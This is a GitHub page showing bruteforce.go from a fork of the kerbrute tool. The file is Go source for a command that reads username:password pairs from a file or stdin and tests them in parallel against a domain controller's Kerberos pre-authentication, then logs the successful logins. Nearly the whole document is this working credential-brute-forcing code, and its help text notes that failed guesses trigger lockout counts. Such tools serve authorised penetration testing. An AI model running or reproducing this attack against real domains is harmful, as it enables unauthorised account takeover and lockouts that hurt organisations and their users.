forked from ropnop/kerbrute
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbruteforce.go
89 lines (76 loc) · 2.27 KB
/
bruteforce.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
package cmd
import (
"bufio"
"os"
"sync"
"sync/atomic"
"time"
"github.com/ropnop/kerbrute/util"
"github.com/spf13/cobra"
)
// bruteuserCmd represents the bruteuser command
var bruteForceCmd = &cobra.Command{
Use: "bruteforce [flags] <user_pw_file>",
Short: "Bruteforce username:password combos, from a file or stdin",
Long: `Will read username and password combos from a file or stdin (format username:password) and perform a bruteforce attack using Kerberos Pre-Authentication by requesting at TGT from the KDC. Any succesful combinations will be displayed.
If no domain controller is specified, the tool will attempt to look one up via DNS SRV records.
A full domain is required. This domain will be capitalized and used as the Kerberos realm when attempting the bruteforce.
WARNING: failed guesses will count against the lockout threshold`,
Args: cobra.ExactArgs(1),
PreRun: setupSession,
Run: bruteForceCombos,
}
func init() {
rootCmd.AddCommand(bruteForceCmd)
}
func bruteForceCombos(cmd *cobra.Command, args []string) {
combolist := args[0]
stopOnSuccess = false
combosChan := make(chan [2]string, threads)
defer cancel()
var wg sync.WaitGroup
wg.Add(threads)
var scanner *bufio.Scanner
if combolist != "-" {
file, err := os.Open(combolist)
if err != nil {
logger.Log.Error(err.Error())
return
}
defer file.Close()
scanner = bufio.NewScanner(file)
} else {
scanner = bufio.NewScanner(os.Stdin)
}
for i := 0; i < threads; i++ {
go makeBruteComboWorker(ctx, combosChan, &wg)
}
start := time.Now()
Scan:
for scanner.Scan() {
select {
case <-ctx.Done():
break Scan
default:
comboline := scanner.Text()
if comboline == "" {
continue
}
username, password, err := util.FormatComboLine(comboline)
if err != nil {
logger.Log.Debug("[!] Skipping: %q - %v", comboline, err.Error())
continue
}
time.Sleep(time.Duration(delay) * time.Millisecond)
combosChan <- [2]string{username, password}
}
}
close(combosChan)
wg.Wait()
finalCount := atomic.LoadInt32(&counter)
finalSuccess := atomic.LoadInt32(&successes)
logger.Log.Infof("Done! Tested %d logins (%d successes) in %.3f seconds", finalCount, finalSuccess, time.Since(start).Seconds())
if err := scanner.Err(); err != nil {
logger.Log.Error(err.Error())
}
}